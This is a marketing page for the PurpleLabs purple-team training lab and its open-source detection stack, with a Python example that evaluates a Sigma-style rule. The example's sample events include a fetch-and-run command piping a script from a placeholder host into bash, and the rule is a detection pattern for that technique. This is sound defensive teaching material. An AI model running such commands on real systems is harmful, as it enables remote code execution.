Platform

PurpleLabs

The primary goal of PurpleLABS is to teach you how to generate offensive attack events and symptoms, and then detect them in the next phase using an Open Source SOC stack powered by Sigma rules (the open, vendor-neutral signature format for describing log events) together with the other dedicated Open Source security solutions deployed in the lab.

  • Detection as Code vs Adversary Simulations
    Use the unique "Detection as Code vs Adversary Simulations" approach and raise your level of knowledge across the Red / Blue / Purple team scope
  • Attack events
    Generate APT-style offensive attack events and detect them using an Open Source SOC stack powered by Sigma rules, the generic signature format for SIEM systems
  • Flip mode
    Learn detection through the attack itself, in an attractive, standardized format driven by the Open Source security community
  • Visibility and accounting
    Improve the detection capability of your SOC teams and achieve better visibility, accounting, and resistance to attacks
  • Open Source for detection and hunting
    Learn how to use the best Open Source projects in your Security Operations Center by working on a real network with Wazuh, Graylog, Elastic Security, Falco, Tracee, Kunai, Sysmon4Linux, FleetDM osquery, Syslog, Velociraptor, Zeek, Suricata and more.
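What "Detection as Code" looks like at the smallest scale, as an added example that is not PurpleLABS content and not the Sigma project's own code: a rule written in the shape of a Sigma rule (logsource, named selections with field modifiers, a condition that combines them) evaluated against constructed Linux process-creation events. The rule, the events, and the tiny evaluator are all assumptions made for this example; in a real SOC stack the rule would instead be converted with pySigma/sigma-cli into the query language of the backend (Elastic, Splunk, Graylog, ...).

```python
"""Detection as Code at the smallest scale: a Sigma-style rule evaluated in pure Python.

Constructed example; the rule and the events are written for this page and are not
PurpleLABS content. Real deployments convert Sigma rules with pySigma/sigma-cli into
the query language of the target backend instead of evaluating them directly like this.
"""

# Constructed rule in the shape of a Sigma rule: logsource, named selections,
# field modifiers (endswith, contains, all) and a condition combining them.
RULE = {
    "title": "Remote script piped into a shell",
    "logsource": {"product": "linux", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["/bash", "/sh", "/zsh"],
            "CommandLine|contains|all": ["curl ", "|"],
        },
        # Noisy but legitimate source, excluded by the condition below
        "filter": {"User": "builduser"},
        "condition": "selection and not filter",
    },
}

# Constructed process-creation events (field names follow Sysmon EventID 1).
EVENTS = [
    {"Image": "/usr/bin/bash", "User": "www-data",
     "CommandLine": "bash -c 'curl -s http://example.invalid/x.sh | bash'"},
    {"Image": "/usr/bin/bash", "User": "builduser",
     "CommandLine": "bash -c 'curl -s http://example.invalid/x.sh | bash'"},
    {"Image": "/usr/bin/curl", "User": "www-data",
     "CommandLine": "curl -s https://example.invalid/index.html"},
    {"Image": "/bin/sh", "User": "www-data",
     "CommandLine": "sh -c 'ls -la | grep foo'"},
]


def match_value(value, pattern, modifiers):
    """Compare one field value with one pattern; Sigma string matching is case-insensitive."""
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in v
    if "startswith" in modifiers:
        return v.startswith(p)
    if "endswith" in modifiers:
        return v.endswith(p)
    return v == p


def match_field(event, key, patterns):
    """'Field|mod1|mod2': [p1, p2] is OR over the list, or AND when the 'all' modifier is present."""
    field, *modifiers = key.split("|")
    if field not in event:
        return False
    if not isinstance(patterns, list):
        patterns = [patterns]
    hits = [match_value(event[field], p, modifiers) for p in patterns]
    return all(hits) if "all" in modifiers else any(hits)


def match_selection(event, selection):
    """Every field listed in a selection map must match (AND across fields)."""
    return all(match_field(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """Evaluate the condition; supports the common 'A', 'A and B', 'A or B', 'A and not B' forms."""
    detection = rule["detection"]
    result, op, negate = None, None, False
    for token in detection["condition"].split():
        if token in ("and", "or"):
            op = token
        elif token == "not":
            negate = True
        else:
            value = match_selection(event, detection[token]) != negate
            negate = False
            if result is None:
                result = value
            elif op == "and":
                result = result and value
            else:
                result = result or value
    return bool(result)


def scan(rule, events):
    """Return the indices of the events the rule fires on."""
    return [i for i, e in enumerate(events) if evaluate(rule, e)]


if __name__ == "__main__":
    for i in scan(RULE, EVENTS):
        print(f"[{RULE['title']}] event {i}: {EVENTS[i]['CommandLine']}")
```

Only the first event fires: the second is identical but comes from the excluded build user, the third is curl without a shell as the image, and the fourth is a shell pipeline with no curl. Running the same four events through the rule after it has been converted to an Elastic or Splunk query is exactly the check you perform in the detection phase to prove the attack you generated is visible in the SOC stack.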

Key Features

Virtual infrastructure

Dedicated virtual infrastructure for detecting and analyzing modern adversaries' tactics, techniques, and procedures (TTPs).

Analytical interfaces

Analytical interfaces for all important host, network, and application data sources used during DFIR activities.

Learning abilities

Lets you learn about current trends in offensive actions (red teaming) and the corresponding detection points (blue teaming).

Hunting friendly

Provides an alternative approach to dealing with cyber-attacks: proactively searching across security data in a standardized way.

Hunting Components

Elastic Security

Elastic Security unifies SIEM, endpoint security, and cloud security on an open platform, arming SecOps teams to protect, detect, and respond at scale.

Splunk

Splunk is software for searching, monitoring, and analyzing machine data. It captures, indexes, and correlates real-time data and can generate graphs, reports, alerts, dashboards, and visualizations.

Moloch/Arkime FPC

Arkime (formerly Moloch) is a large-scale, indexed full packet capture (FPC) and search system. It stores network traffic on disk in PCAP format and indexes session metadata in Elasticsearch (ES), providing fast access to the captured data.

Wazuh

Wazuh is an Open Source security platform built around a host-based intrusion detection system (HIDS). It gives you deeper security visibility into your infrastructure by monitoring hosts at the operating system and application level.

Graylog

Graylog is a free and open source log management platform that collects, indexes, and analyzes both structured and unstructured data from almost any source.

FleetDM osquery

Fleet (FleetDM) is the open source continuation of the Kolide Fleet server. This central management server lets you deploy and control your osquery endpoints at scale for hunting, detection, and incident response.

Velociraptor DFIR

Velociraptor is a tool for collecting host-based state information using Velocidex Query Language (VQL) queries. It is a unique, advanced open source endpoint monitoring, digital forensics, and incident response platform.

Sandfly Security

Sandfly is an agentless intrusion detection and incident response platform for Linux. It automates the search for attackers, malware, and suspicious activity on your Linux systems.

Our Customers & Recommendations

Contact Us

If you have any questions, please use the form below: